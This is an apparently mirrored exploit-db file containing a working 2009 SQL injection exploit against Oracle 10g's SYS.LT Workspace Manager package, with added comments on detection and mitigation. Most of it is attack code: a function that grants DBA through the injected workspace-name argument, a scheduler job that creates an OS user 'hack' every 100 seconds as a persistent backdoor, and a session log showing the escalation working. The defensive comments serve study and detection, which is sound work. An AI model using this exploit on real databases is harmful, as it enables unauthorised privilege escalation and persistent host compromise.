exploit-db-mirror/exploits/multiple/local/7677.txt
/*********************************************************/
/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/
/**grant DBA and create new OS user (using scheduler)****/
/*********************************************************/
/***********exploit grant DBA to scott********************/
/***********and execute OS command "net user"*************/
/***********using scheduler*******************************/
/*********************************************************/
/***********tested on oracle 10.1.0.5.0*******************/
/*********************************************************/
/*********************************************************/
/* Date of Public EXPLOIT: January 6, 2009 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsecrg.ru */
/* http://www.dsec.ru */
/*********************************************************/
/*Original Advisory: */
/*Esteban Martinez Fayo [Team SHATTER ] */
/*Date of Public Advisory: November 11, 2008 */
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
/*********************************************************/
-- Baseline: record the caller's roles before anything runs, so the identical
-- query at the end of the script shows whether DBA was added.
select * from user_role_privs;
-- Attacker-owned helper that the injected predicate below evaluates.
-- Its body is nothing but privilege grants issued through EXECUTE IMMEDIATE;
-- PRAGMA AUTONOMOUS_TRANSACTION lets them COMMIT independently of whatever
-- statement invoked the function. AUTHID CURRENT_USER makes the grants run
-- with the rights of the invoking context rather than SCOTT's own — the
-- injection into the SYS-owned LT package is what supplies those rights
-- (inferred from the advisory cited in the header; confirm against it).
-- Defender notes: a successful run shows up as a new DBA row in
-- DBA_ROLE_PRIVS and, where GRANT auditing is enabled, in the audit trail.
-- A user-schema function whose source consists only of
-- EXECUTE IMMEDIATE 'GRANT ...' is itself a high-signal indicator; DBA_SOURCE
-- can be searched for that pattern.
CREATE OR REPLACE FUNCTION Z return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT';
COMMIT;
RETURN 'Z';
END;
/
-- Injection point: the workspace-name argument closes the quoted literal and
-- appends "and SCOTT.Z()='Z'", so SCOTT.Z() is evaluated inside SQL built by
-- the SYS-owned LT package. The same payload is delivered through two entry
-- points (CREATEWORKSPACE, COMPRESSWORKSPACETREE).
-- Mitigation is the vendor fix referenced by the original advisory in the
-- header; if Workspace Manager is not in use, reviewing who holds EXECUTE on
-- SYS.LT is a reasonable additional hardening step (verify dependencies first).
-- Detection: workspace names containing quote characters or SQL keywords in
-- the Workspace Manager metadata are anomalous and worth alerting on.
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z');
exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z');
/* A backdoored OS user "hack" with password 12345 is created using an external job. */
/* Note that with this method the user is re-created every 100 seconds, */
/* so if an administrator finds it and tries to delete it, */
/* the user "hack" is created again. It therefore also serves as a simple backdoor. */
-- Scheduler program of type EXECUTABLE: program_action is an OS command line
-- (cmd /c ... net user ... /add), so execution leaves the database and runs on
-- the host under whatever account the external-job mechanism uses for this
-- Oracle version (confirm for your install; the header says 10.1.0.5.0).
-- Detection, database side: rows in DBA_SCHEDULER_PROGRAMS with
-- PROGRAM_TYPE = 'EXECUTABLE' owned by non-administrative schemas.
-- Detection, host side: local account creation events (on Windows,
-- Security event 4720) originating from the database server process tree.
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name=> 'MyCmd',
program_type=> 'EXECUTABLE',
program_action =>Âcmd /c "net user hack 12345 /add"Â’,
enabled=> TRUE);
END;
/
-- Job bound to the program above with repeat_interval FREQ=SECONDLY;INTERVAL=100:
-- this is the persistence mechanism described in the comment block above.
-- Removing the OS account alone is undone on the next run; the scheduler job
-- (and program) must be dropped as well during clean-up.
-- Detection: DBA_SCHEDULER_JOBS with very short repeat intervals that reference
-- an EXECUTABLE program; DBA_SCHEDULER_JOB_RUN_DETAILS records each execution
-- and gives a timeline of how long the job has been firing.
BEGIN
DBMS_SCHEDULER.CREATE_JOB (
job_name=> 'extjobexec',
program_name=> 'MyCmd',
repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100',
enabled=> TRUE,
comments=> 'create backdoor user every 100 seconds');
END;
/
/* Any OS command could be placed in the program; this example creates a new user. */
-- Trigger the job immediately rather than waiting for the first scheduled
-- interval, then repeat the baseline query to confirm the DBA role is now
-- present for the current user.
exec dbms_scheduler.run_job('extjobexec');
/
select * from user_role_privs;
---------------------------------------------------------------------------------
-----------------------------EXAMPLE OF EXPLOITATION ----------------------------
---------------------------------------------------------------------------------
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN RESOURCE NO YES NO
SQL> CREATE OR REPLACE FUNCTION X return varchar2
2 authid current_user as
3 pragma autonomous_transaction;
4 BEGIN
5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN';
6 COMMIT;
7 RETURN 'x';
8 END;
9 /
Function created.
SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN DBA NO YES NO
OUTLN RESOURCE NO YES NO
SQL>
// milw0rm.com [2009-01-06]